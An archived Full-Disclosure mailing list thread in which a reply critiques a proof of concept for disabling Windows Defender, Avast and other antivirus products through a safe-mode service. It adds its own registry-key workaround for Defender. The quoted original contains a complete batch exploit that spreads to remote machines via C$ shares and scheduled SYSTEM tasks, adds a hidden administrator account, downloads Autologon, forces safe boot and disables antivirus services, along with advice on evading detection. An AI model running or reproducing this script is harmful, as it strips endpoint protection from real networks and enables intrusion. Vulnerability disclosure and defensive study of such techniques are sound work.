lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 9 Dec 2020 06:35:49 -0500
From: edwin@...mainstreet.net
To: fulldisclosure@...lists.org
Subject: Re: [FD] Disable Windows Defender and most other 3rd party
 antiviruses

I tested your POC on Windows 10 home, build 1904, and it failed to disable Windows Defender.  Windows Defender still loads in safe mode, so renaming the

"C:\Program Files (x86)\Windows Defender" folder fails because an executable in the folder is running.  To disable Windows Defender, you need to boot into safe mode, rename the HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend registry key so that Defender is not loaded at next safe boot, then reboot into safe mode again, where you can rename the folder.

I rather hope Microsoft doesn't change this because I have been seeking ways to disable Defender for a long time.  It is the worst antivirus tool, guzzles battery,
slows my rather fast system to a crawl. I actually agree with Microsoft that this isn't a real security risk, given that it needs administrative privileges to start, and
that it requires such an obvious reboot into safe mode.


On 12/6/2020 9:00 PM, Roberto Franceschetti wrote:
> Windows Defender and most other antivirus applications can be disabled by booting into safe mode and renaming their application directories before their AV services are started in Windows. The renaming of the directories can be performed by creating a Windows NT Service that is allowed to start in Safe Mode. While Windows stops most non-Windows, non-critical services from starting when booting in Safe mode, I was able to make sure that my service is started by adding it to:
> HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\[service name]
>
> I have successfully tested POCs on fully patched Windows 10 and Windows Server 2016 machines. In all cases I was able to disable the following antivirus products, even if they each had their flavor of password/tamper protection enabled:
> Windows Defender
> Avast
> Kaspersky
> F-Secure
> Bitdefender
> [one more product goes here, but as that vendor recognized the issue and has worked on a fix I will not mention it]
>
> The POC consists of a single .bat file that can be used to either disable the antivirus on the local machine, or one running on a remote endpoint.
>
> Disclosure: Local admin rights are needed on the victim's PC (very common for home users). For a remote exploit, this POC additionally requires the  attacker to have access to the remote C$ share and to be able to schedule tasks remotely. Note that this however is a common scenario for IT tech support staff - if just one of them is tricked into executing the exploit, this could cause all AV protection on all Windows endpoints in the corporate network to be disabled.
>
> A sample exploit to disable both Windows Defender and Avast can be found below. The code is self-explanatory. On:
> https://logsat.com/WindowsAVBypass/
>
> you can find more details as to why I'm releasing this publicly, along with an additional POC sample that is used to disable Bitdefender. Bitdefender detects the original POC as malicious, but all that is needed to bypass that AV is to split each command in a separate scheduled task. Please note that some A/V might now detect this specific code as malicious, but what matters is the methodology that allows to disable the AVs - the steps can be performed in several different ways to go undetected.
>
> A screencast showing the POC remotely disabling Avast and Windows Defender is at: https://youtu.be/VE3gwXt6uWg
>
> Roberto Franceschetti
> LogSat Software
>
>
> ============= Avast-DisableAV-Remote.bat ================================
>
> REM - Author: Roberto Franceschetti
> REM - Usage - to disable AV on local machine: C:\>Avast-DisableAV-Remote.bat
> REM - Usage - to disable AV on remote machine: C:\>Avast-DisableAV-Remote.bat TargetComputerName (must be a hostname - IP won't work)
>
> IF NOT [%1] == [] (GOTO Remote) ELSE (GOTO Local)
>
> :Remote
> rem - we are exploiting a remote computer - copy script to victim and schedule task to execute it
> COPY "%~dp0Avast-DisableAV-Remote.bat" \\%1\C$\windows\temp\Avast-DisableAV-Remote.bat
> powershell -command "& {$time = [DateTime]::Now.AddMinutes(1);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /s %1 /SC ONCE /TN 'DisableAvast' /TR 'C:\Windows\temp\Avast-DisableAV-Remote.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }"
> GOTO :eof
>
> :Local
> rem - We are running .bat locally - run the exploit
> rem - create local admin account used to autologin on first safe boot
> net user AvastBounty "Avast123" /ADD
> net localgroup administrators AvastBounty /add
>
> rem - add autologin registry entries for next reboot
> powershell -command "& { iwr https://live.sysinternals.com/Autologon.exe -OutFile c:\windows\temp\Autologon.exe }"
> c:\windows\temp\Autologon.exe -accepteula AvastBounty . Avast123
>
> rem - Now configure the next reboot in safe mode and autologin
> bcdedit /set {default} safeboot minimal
>
> rem - create the batch file executed by the DisableAvast service after the safe reboot
> rem - will rename ProgramFiles\Avast folders/filesystem drivers, disable WinDefender
> rem - will remove the safebot/autologon entries and reboot
>
> @echo off
> echo cd c:\windows\temp > c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Avast Software" "Avast Software Disabled" >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Windows Defender" "Windows Defender Disabled" >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Windows Defender Advanced Threat Protection" "Windows Defender Advanced Threat Protection Disabled" >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files (x86)\Windows Defender" "Windows Defender Disabled" >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\ProgramData\Avast Software" "Avast Software Disabled" >> c:\windows\temp\DisableAvastAV.bat
>
> echo sc config "avast! Antivirus" start=disabled >> c:\windows\temp\DisableAvastAV.bat
> echo sc config "avast! Tools" start=disabled >> c:\windows\temp\DisableAvastAV.bat
> echo sc config "AvastWscReporter" start=disabled >> c:\windows\temp\DisableAvastAV.bat
> echo sc config "aswbIDSAgent" start=disabled >> c:\windows\temp\DisableAvastAV.bat
> echo sc config WinDefend start=disabled >> c:\windows\temp\DisableAvastAV.bat
>
> echo timeout /t 10 >> c:\windows\temp\DisableAvastAV.bat
> echo net stop SAVService >> c:\windows\temp\DisableAvastAV.bat
> echo net stop hmpalertsvc >> c:\windows\temp\DisableAvastAV.bat
> echo timeout /t 10 >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Avast" Avast_Disabled >> c:\windows\temp\DisableAvastAV.bat
>
> echo reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f /t REG_SZ /d "0" >> c:\windows\temp\DisableAvastAV.bat
> echo bcdedit /deletevalue {default} safeboot >> c:\windows\temp\DisableAvastAV.bat
> echo sc delete DisableAvast >> c:\windows\temp\DisableAvastAV.bat
> rem - echo pause >> c:\windows\temp\DisableAvastAV.bat
> echo shutdown /r /f /t 0 >> c:\windows\temp\DisableAvastAV.bat
>
> rem - now create the Powershell script that will create a "DisableAvastAV.exe" that will simply execute the DisableAvastAV.bat batch file above:
> rem - this is done as Windows 10 won't allow a service to run a .bat file, but a .exe will however run once just fine even if the service fails to start
>
> echo $source = @^" > c:\windows\temp\CreateService.ps1
> echo   using System; >> c:\windows\temp\CreateService.ps1
> echo   class Hello { >> c:\windows\temp\CreateService.ps1
> echo     static void Main() { >> c:\windows\temp\CreateService.ps1
> echo      System.Diagnostics.Process.Start(^"C:\\Windows\\Temp\\DisableAvastAV.bat^"); >> c:\windows\temp\CreateService.ps1
> echo     } >> c:\windows\temp\CreateService.ps1
> echo   } >> c:\windows\temp\CreateService.ps1
> echo ^"@ >> c:\windows\temp\CreateService.ps1
> echo Add-Type -TypeDefinition $source -Language CSharp -OutputAssembly ^"C:\Windows\Temp\DisableAvastAV.exe^" >> c:\windows\temp\CreateService.ps1
>
> @echo on
>
> rem - now execute the powershell script to create the DisableAvastAV.exe file and install it as a service:
> powershell set-executionpolicy -executionpolicy bypass
> powershell c:\windows\temp\CreateService.ps1
> sc create DisableAvast binpath="c:\windows\temp\DisableAvastAV.exe" start=auto
>
> rem - this entry will allow the DisableAvast service to run in Safeboot as well, otherwise it won't start:
> reg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\DisableAvast /f /t REG_SZ /d "service"
>
> rem - now reboot... Safe mode will be activated and the DisableAvastAV.exe service will run, calling the DisableAvastAV.bat script, renaming the Avast folders no longer protected by Tamper Protection
> rem - pause
> shutdown /r /f /t 0
>
> =============================================
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists